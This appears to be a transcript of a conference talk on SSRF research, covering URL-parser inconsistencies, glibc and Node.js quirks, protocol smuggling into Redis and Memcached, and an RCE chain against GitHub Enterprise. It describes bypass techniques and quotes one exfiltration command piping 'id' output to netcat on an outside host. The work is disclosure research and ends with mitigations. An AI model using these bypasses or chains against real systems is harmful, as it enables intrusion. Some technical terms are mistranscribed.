Thanks for coming. This talk will be more about the research on web security. SSRF is an attack technique on web application. The first concept of SSRF was found 10 years ago. Since then, many exploitations and mitigations were developed. In this talk, I will show you some of my findings. These findings are not only able to bypass existing SSRF protections, but also lead to critical remote code executions. Also, we will give case studies in real web application and a demo on GitHub Enterprise. Okay, now, if you feel like going to other tracks, like hacking democracy or open source self-cracking llamas, this is your last chance. Okay, let's go. Hi again, I'm Orange from Taiwan. Taiwan is a country in Asia and we speak Mandarin Chinese. As you can see, my English is not good. For this reason, I prepared several months for this talk. I will try my best to give this talk. Thank you for bearing with me. I have just got my MS degree and work in a security startup. I can say that DevCore is the most professional red team in Taiwan. I'm a vulnerability researcher in DevCore. I can do reversing stuff, binary exploitation, but my favorite is still web security. Nice. I'm also a member of ChangeLoot and HitCon. ChangeLoot is the earliest hacker group in my country. In addition, we hold HitCon, the largest hacker conference in Taiwan. By the way, HitCon 2017 will take place on August 24 and 25. Welcome to join us. Here is a brief introduction of myself. I'm a speaker, CTF player, and a bug bounty hunter. In web security, I love server-side vulnerability more than client-side. To take control of a server is more fun for me. So, I love remote code execution in particular. And you can see what vendors I report RCE to: Facebook, GitHub, Apple, Uber, and so on. Someone told me always put cats in your slides so that you can catch all the eyes and never fail your talk. Nobody has cats, right? This is our agenda today. Our goal is to make SSRF great again. First, I will introduce SSRF and start with some quick fun examples. Next, I will talk about my findings in both an attack surface on SSRF bypass and a new attack vector in protocol smuggling that enhances the existing SSRF. By combining this, we can achieve more advanced exploitations or compromise the server. Of course, we will have case studies and demo. What is SSRF? Okay, I know this is DEFCON, not SSRF 101. So I don't need to talk about lots of trivial introductions. I suppose you all know what SSRF is. SSRF, in a word, it can bypass the firewall and touch your intranet. So the attack surface is dependent on how big your intranet is. The larger your enterprise is, the more robust SSRF will be. For example, in a big company, there are lots of Trust2, Elastic, Redis you can pump by SSRF. Next, protocol smuggling in SSRF. It makes SSRF more powerful. There are several ways to smuggle protocols in a SSRF, and each way has its limitation. So, what protocol is good to smuggle? I have list here, and you can check. Okay, our introduction part is over. Short, right? Before we start our topic, I want to make a survey. How many people use Python? Please raise your hand. Wow. Okay, DevCon, PythonCon. I want to ask you a question. If you want to access the web with Python, which library do you prefer? Nice. I think the most Python guys use request S, URL-lib, or URL-lib 2. Let's start with a fun example. Think about this URL. The red square is the space. So, which address Python is going to access? I gave you 5 seconds to put answer in your mind. 1, 2, 3, 4, 5. Okay, here's the answer. Actually, even Python's built-in libraries treat the same URL differently. URL-lib access the blue part, and the URL-lib 2 access the orange part, but green is request S. It sounds crazy. Python is really, really hard. I don't understand Python. Another showcase, it is easy to understand if there is a SSRF injection in HTTP and we can smuggle other protocols. But as you can see, for the security concern, most of SMTP server blocks the HTTP connection. If server find the HTTP pattern such as get / or post / in the incoming request, the server will cut off the connection. SMTP has HTTP protocol, and it seems unexploitable. Somebody might say you can use Gopher. We are not going to talk about Gopher today. Gopher is good, but what if there is no Gopher support? Gopher is too easy to block, and not all programming languages support Gopher. But in a SSRF, the HTTP always exists. So we focus on the attack scenario on the HTTP and HTTPS. Let's smuggle SMTP protocol over HTTPS. HTTPS is a secured protocol, so the payload will be encrypted. So how? Let's think about a question. What won't be encrypted in a SSL handshake? Does anyone have an idea? Okay, the answer is SNI, server name indication. We can send a HTTPS request on port 25 to bypass the limitation. Smuggle SMTP over SSL SNI, I think no one mentioned this before. During the SSL, the hello messenger will be the handshake that exchanges the metadata between the server and the client. And there is a SNI extension which specifies the remote hostname in this messenger. So, what if we can disrupt the hostname? Yes, the yellow square. This space makes it possible to embed malicious payload in the domain name. So you can see with the space, we can now inject new lines and data in the domain name. Okay, why this works? We use a trick in Linux glibc, and we will introduce later. The data separated by new lines is SMTP protocol we smuggled. Our command simply requires the SMTP server to send a mail. This is the request and the response in plain text. You can see there is no HTTP pattern here. There is no HTTP pattern such as get/ or post/ here. And the server recognizes our payload as a valid command. Oh, drunk. So we exploit the unexploitable successfully. These two examples are interesting, right? Okay, let's go to our main content. Yeah, make SSRF great again. Today, we prepared 4 sections to make SSRF great again. First part, URL parsing issues. This is all about the inconsistency between the URL parser and the URL requester. It is common to fix a SSRF by validating the URL. But validating a URL is a hard work. Why? The spec of URL is defined in RFC 3986, but only spec without implementation guidelines. WG is a community trying to define a modern implementation based on RFC. But in fact, programming languages still prefer their own implementation model. So there are lots of mistakes on URL parsers. How RFC defines a URL? This is the URL components defined in RFC 3986. There are totally 5 parts: scheme, authority, path, query, and fragment. And this is what we will cover today: the scheme, authority, and path. For the scheme, we only care about the attack scenario on the HTTP and HTTPS. For the authority and path, they are too complex to understand, and we will take a look later. Finally, as the query and fragment, I don't care. This is the big picture of problems we will mention today. We classify the URL parsing issue into 3 types: poll injection, host injection, and path injection. So does protocol smuggling, smuggling on path, smuggling on host, and smuggling on SNI. Consider the following code in PHP. The code simply fetches the user-provided URL. In order to prevent SSRF, developers use the function parsURL to check whether the host and poll are valid or not. So, if you provide 127.0.0.1 and poll 81, you will not pass the check. But how about this URL? Everyone knows colon is the separate between the host and the poll. RFC defined the spec but didn't say how to implement. So, will the colon be interpreted from the front or the back? It is interesting. For this URL, the PHP function parsURL recognizes 80 as poll number. But actually, PHP read file fetches the poll number 11211. Both parsURL and read file are the built-in functions in PHP, but their behaviors are very distinct. So, we can use this inconsistency to bypass the check. And how about this URL? google.com@avo.com. This is another interesting case. Parse URL will recognize google.com as hostname, but the read file fetches avo.com. This URL perfectly bypassed all the restrictions. But are you curious about which behavior is the right one? Let's make a little survey again. If you think google.com is the right one, please raise your hand. Okay. Okay, I think the domain avo.com already told you the answer. Several programming languages suffered from this issue, like PHP, Java, Perl, and Python. According to the IFC, the authority part is preceded by a double slash and is terminated by the next slash, question mark, or number sign. So the appropriate authority part is google.com. Okay, if you don't like PHP, let's explore curl. Curl is a world-famous library, and there are lots of language bindings. Think about how curl interprets this URL. foo@avo.com, port 80 at google.com. Most parsers recognize google.com as a valid hostname, but curl fetches avo.com. The inconsistency between the parser and curl will also lead to security problems. I think we all agree that curl is a world-famous library with lots of language bindings. Therefore, if an application uses its parsing library to track the URL but fetch the resource by curl, it might be vulnerable. This is very common in PHP because PHP built-in HTTP library sucks. After I find this problem, I quickly report to the curl security team, and their reply is in no time. But while checking the patch, I find we can simply bypass the patch by an additional space. This is not the fault of curl. This also uses a feature in Linux glibc, and we will talk about later. However, I think curl can be more strict, so I report again. But this time, curl team replied, curl doesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URL and assume that you passed correct input. Curl thinks this is programmers' problems, so this won't be fixed. But previous patch still applied on curl 7.54. The next attack vector is about the Unicode failure on Node.js. Look at the following code. In order to prevent directory traversal, the code checked there is no dub in the path. So you can't access the file outside the sandbox directory. The question is, if there is a password file on the web root, how to access the file? Does anyone have an idea? Okay. The answer is using the Unicode symbol full with n. This URL actually accesses the file password on the web root. Okay, let's explain why. The JavaScript's internal processes the Unicode string as encoding UCS2. So the Unicode symbol n will be represented in FF2E. And the tricky thing is the buffer string in HTTP module will fold the byte, and the FF will be stripped. and the remaining part is 2e, the ASCII of Dart. The server will identify the dart slash as the parent directory. So we can download the password file on the web root from the remote server. The double full with n is the new dot slash in Node.js HTTP module. What the hell? I have nothing to say. This technique can be also applied on protocol smuggling. Originally, HTTP module prevents users from SSRF injection. The HTTP module will encode the new line as percent encoding. So, if we inject new lines in the past, our smuggling will fail. But we can break the protection by Unicode symbol FF0D and FF0A, the full with dash and the full with asterisk. The HTTP module cannot locate any new lines in the past, but output still for the byte and strip the FF. So our protocol smuggling reproduced again. Next section is about the features on Linux glibc. First, this is a weird feature in NSS function getHostByName. By looking the source of glibc, there is a command here. Convert an ASCII string into an encoded domain name as per IFC 1035. But what is IFC 1035? The IFC 1035 describes the detail of the domain system and the protocol. But the surprise is the domain system supports decimal conversion in getHostByName. You can see the C program. The result of OR \097 NGE.tw is equal to the result of orange.tw. I roughly grabbed the Linux main page, but I didn't find anything related to this weird feature. I think this may be useful when bypassing some blacklist protections. And the source code showed that getHostByName will remove the backslash that is not followed by digit. This is also a good way to obfuscate your domain name with lots of backslashes. You can see I print out the host to show that the escaping process is done by getHostByName. The next feature is about the Linux getAddress info. GetAddress info will strip sharing rubbish followed by a valid IP format and a white space. You can also see the C program. The domain 127.0.0.1 space FOO is valid and return 127.0.0.1. GetAddress info is a very fundamental function in Linux. For example, the function getHostByName in Python socket module relied on Linux getAddress info. So the CRLF FOO in the domain name will be removed. This makes it possible to do more complex attacks based on the polluted domain name. Okay, let's talk about how to exploit MSS features on URL parsers. URL parsers might recognize all the authority part as hostname, but HTTP requests still fetch 127.0.0.1. The %2509 is a special one and needs more explanations. Why double encoding works? After digging the source, we find that libraries such as Perl decode the URL twice. So these patterns are useful when breaking some subdomain checks. Next, exploit unaccessed features on protocol smuggling. First, why this works? This is because that HTTP protocol 1.1 required a host header. And most of libraries embed the hostname into HTTP request. So the idea is, if we can inject new lines in the hostname, we have the ability to smuggle protocols in HTTP. For example, the data with new lines in the hostname will be recognized as a valid Redis command. You can see we smuggle the sled of the command over the HTTP protocol. By the way, the sled of is a nice command that you can make outbound traffic. This is a useful trick when you are facing some blind SSRF. SNI injection is also the same idea. During the SSL, the SNI extension will embed the hostname in the hello messenger. So, if we inject new lines in the hostname, we can find out the command in the encrypted messenger. Let's break the patch of Python CVE 2016-5699. It's a SSRF injection in the function put header of the module HTTP lib. It also affects both URL lib and URL lib 2 because they use HTTP lib to construct their HTTP request. Python uses a regular expression to ensure there is no new line in the header. Otherwise, it will raise an error. But Python makes an exception of the tab and space followed by the new line. So we can break the patch by a leading space. You can see with the space of the URL lib and URL lib 2 are vulnerable again. But this brings out a new problem. There is one more leading space in our payload. Does protocol smuggling work this way? The answer is yes, thanks to Redis and main cache. As you can see, the sled of commands start with a leading space, but the server still replied OK. Redis and main cache will strip the leading space. So our exploit works again. Next attack vector is about the IDMA standard. IDMA defines the standard of Unicode in domain name system. There are two primary versions of IDMA, IDMA 2003 and 2008. But IDMA 2008 is too strict. So most of parsers followed IDMA 2003 with UTS-46 transition. The IDMA supports lots of weird Unicode transitions. For example, the circled alphabet will be recognized as a valid letter in domain name system. And the Unicode 200D 0 with joiner will be removed in IDMA 2003 with UTS-46 transition. So, if the parser and the requester adopt different IDMA standard, it might be a security problem. A very fun example is the Latin letter small sharp s. This is a JavaScript example that you can run on your browser consoles. You can see the symbol in lowercase is the same as itself. But in uppercase, it becomes the double capital S. and the redirection in browsers will go to WordPress.com. This is useful when breaking some blacklist, and we will give you a real case study later. Okay, case studies. This is not typo, CAT studies. Let's study some real-world cases. WordPress is a very famous web application, and it had a lot of attention on SSRF. But we still find 3 different ways to bypass the protections. Bug has been reported several months ago, but still unpatched. For the responsible disclosure process, is DevCon have? I will use MyBB as my case study instead. However, these techniques are very general, so I think you can use them in anywhere. This table shows the components WordPress, vBulletin, and MyBB will use to treat a URL. The main concept of the bypass is finding different behaviors among the parser, DMS checker, and the requester. If you find one, then you have the ability to bypass the restriction. Okay, this is the source of MyBB. The first bypass is not a new trick. It is time of track to time of use problem. MyBB uses parse URL to track whether the hostname, skin, and poll are valid or not, and also use getHostByName to resolve the domain, ensuring that the address is not in blacklist. If the URL pass all the track, MyBB will fetch the resource by curl. The problem is the state of track and the state of use can be different. So we set up a DNS server and lead the first query to a non-blacklist address, such as 1.2.3.4. After we pass the track, MyBB will fetch the URL and query the domain again. At the moment, we change the DNS record to 127.0.0.1. The state in track is 1.2.3.4, but the state in use is 127.0.0.1, so that we can bypass the protection. The next bypass is about the support of IDMA standard. Curl is a very intelligent library, which can automatically convert the global domain name to an IP address. But PHP getHostByName can't. This inconsistency also leads to SSRF bypass. You can see for the URL, getHostByName will return false and pass the check, but curl still fetches 127.0.0.1. The last bypass is the inconsistency between the parser and the requester. We mentioned several URL parsing bugs before. By using these bugs, we can bypass all the restrictions. For the number sign bug, the parse URL recognizes google.com as hostname, but curl fetches 127.0.0.1. This is handy, but has been fixed in PHP 7.0.13. If you don't like PHP, you can still exploit the bug in curl, and the result is the same. This bug is also fixed in curl 7.54, but most of the patches didn't keep up. For example, the live curl in the latest version of Ubuntu is still 7.52.1. So I think most systems are still on the thread. Or you can use the space technique we mentioned before. And this issue, curl won't fix. Okay, let's see our last case studies, GitHub Enterprise. GitHub Enterprise is a local version of GitHub that you can deploy a whole GitHub service in your private network. Most of the code are written in Ruby on Rails and are first-category. The code base of GitHub Enterprise seems to be sent as github.com since. And there is an environment variable that you can switch the mode from Enterprise to .com version. If you want to study the security on GitHub, I highly recommend GitHub Enterprise to you. In this case, I will show you a beautiful exploit chain that turned 4 vulnerabilities into a critical remote code execution. It also won the best report in GitHub 3rd Bug Bounty anniversary. While playing GitHub Enterprise, I noticed there is an interesting feature called webhook. Webhook can define a custom HTTP callback when specific Git command occurs. GitHub uses RubyGen validity to fetch external resource and prevents users from SSRF by Gen validity restrict IP addresses. The Gen seems to be just a blacklist and can be bypassed by a 0. In Linux, the 0 stands for localhost. Okay, we got a SSRF now. However, we still can't do anything. Why? There are several limitations in this SSRF, such as this SSRF only allows the string HTTP and HTTPS, and we can't change the string by the 302 redirection. This is also a post-based SSRF, and we can't even control the header or the post data. The most important thing is there is no CRLF injection in this SSRF. We have a SSRF, but with lots of limitations. My next idea is there any service we can leverage? It is a bit work. There are several services inside, and each service based on a different language implementation, such as C, C++, Go, and Python. With a couple of days digging, I find there is a service called Graphite on port 8000. Graphite is a highly scalable and real-time graphing system. Of course, we find another SSRF here. The second SSRF is simple. Graphite just fetch the URL from the get parameter. So we have 2 SSRF now, and we can combine these 2 SSRF into a SSRF execution chain. A cool term, right? And we successfully switched a post-based SSRF into a get-based SSRF. The third bug is the CRLF injection on Graphite. As you can see, the implementation of the second SSRF is Python HTTP-lib. Earlier, we mentioned that HTTP-lib suffered from CRLF injection. So, with the CRLF injection, we have the ability to smuggle protocols in this SSRF execution chain. However, the next problem is, what protocol did I choose to smuggle? I spent lots of time to find out what vulnerabilities can be triggered if I can control the Redis or main cache. While reviewing the source, I'm curious about why GitHub can store Ruby object in main cache. After some digging, I find GitHub used a RubyGen to store the cache, and the cache was wrapped by Marshall. It is a good news. Everyone knows Marshall is dangerous. So our goal is clear. We use our SSRF execution chain to store malicious Ruby object in main cache. The next time GitHub fetches the cache, the Ruby gem will deserialize the data automatically. And the result is we got a remote code execution. Here is the final payload. There are several parts. The red part is the first SSRF bypass in webhook. Combined with the blue part, the second SSRF. The yellow is the main cache protocol we smuggled. And the final dark blue part is our malicious Ruby object. In this case, we execute the command id pipe nc orange.tw port 12345. In this case, award $12,500 from GitHub. Okay, I have no time. I think this is a very practical case about the SSRF execution chain and protocol smuggling in the world. Okay, let's watch the demo video. Remote code execution on GitHub Enterprise. Okay, this is GitHub Enterprise. Very similar to GitHub.com, right? Okay, the version is 2.8.6. Oh yeah. In order to add a webhook, we open our profile, repository, and the settings. Yeah. Click hooks and services, and add a webhook. Okay, here is the callback URL. We open our console. Echo hi. This is our exploit file. And run our exploit. Here is our SSRF payload. We pass the payload to the GitHub Enterprise. When we submit the form, the SSRF execution chain will insert a malicious data to the main cache. Okay, we listen a port on 12345 and wait the command back. The final step is to trigger the deserialization. We can search a keyword to trigger the RCE. Okay. I have no time. As you can see, we got a shell. So, with this SSRF execution chain and the protocol smuggling over the main cache, we can execute arbitrary system command on remote server. Mitigations: how to prevent such attacks in SSRF from two aspects. For application layer, use the only IP to connect. And remember, don't reuse the URL that user provided. For network layer, use firewall or network policy to block internal traffic. There are also projects that are designed to prevent you from SSRF attacks. Safeguard by Finite and Advertkit by Jordan Mill. Okay, we have no time. Thanks for finding article. They inspired me to do this research. And thanks to many people who helped me, Alan, Berman, and Harry. This is the end of my presentation. Okay. This is the end of my presentation. If you have further questions, here is my contact information, orange@trenchroot.org, or you can find me on Twitter, orange_A361. Thanks for staying with me. Thanks.